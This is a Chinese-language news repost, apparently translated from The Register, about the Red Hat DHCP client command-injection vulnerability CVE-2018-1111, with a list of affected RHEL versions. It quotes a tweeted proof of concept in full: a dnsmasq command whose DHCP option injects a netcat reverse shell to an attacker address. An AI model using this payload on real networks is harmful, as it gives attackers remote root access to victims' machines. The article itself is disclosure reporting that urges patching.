Red Hat管理员?赶紧卸载Twitter并修补此DHCP客户端错误吧

红帽公司宣布在其DHCP客户端上宣布了一个严重漏洞,虽然它没有响亮的名称,但确实有一个Tweetable概念验证。

这个被命名为CVE-2018-1111的红帽企业Linux和衍生DHCP客户端的命令注入漏洞是由Google员工Felix Wilhelm发现。

“CVE 2018年至1111年是影响红帽衍生物一个非常糟糕的DHCP root远程命令注入:https://access.redhat.com/security/vulnerabilities/3442151 ...。漏洞利用符合推文,所以你应该尽快补丁。“

在这里,是一则发自BarkınKıl​​ıç的Tweet,是个PoC:

#CVE -2018-1111 tweetable PoC :) dnsmasq --interface = eth0 --bind-interfaces --except-interface = lo --dhcp-range = 10.1.1.1,10.1.1.10,1h --conf-file = / dev / null --dhcp-option = 6,10.1.1.1 --dhcp-option = 3,10.1.1.1 --dhcp-option =“252,x'&nc -e / bin / bash 10.1.1.1 1337#”cc :@cnbrkbolat pic.twitter.com/vUICm2HluC - BarkınKıl​​ıç(@Barknkilic)2018年5月15日

(该Tweet中的第三张图片显示攻击者以root身份访问shell。)Red Hat解释说:“恶意的DHCP服务器或本地网络上能够欺骗DHCP响应的攻击者可以使用此漏洞执行任意命令使用NetworkManager并配置为使用DHCP协议获取网络配置的系统的root权限。“

以下是受影响的RHEL版本的完整列表:

Advanced Update Support 6.4; Extended Update Support 7.3; Advanced Update Support 6.6; Red Hat Enterprise Linux 6; Extended Update Support 6.7; Advanced Update Support 7.2; Server TUS (v.6.6); RHEL 7; Extended Update Support 7.4; Virtualization 4 Management Agent for RHEL 7 Hosts; Advanced Update Support 6.5; and Linux Server TUS (v. 7.2)。

Red Hat针对x86和IBM Power架构上SAP解决方案的更新服务也受到影响。

  • 发表于:
  • 原文链接http://www.theregister.co.uk/2018/05/16/red_hat_dhcp_client_bug

扫码关注云+社区

领取腾讯云代金券

年度创作总结 领取年终奖励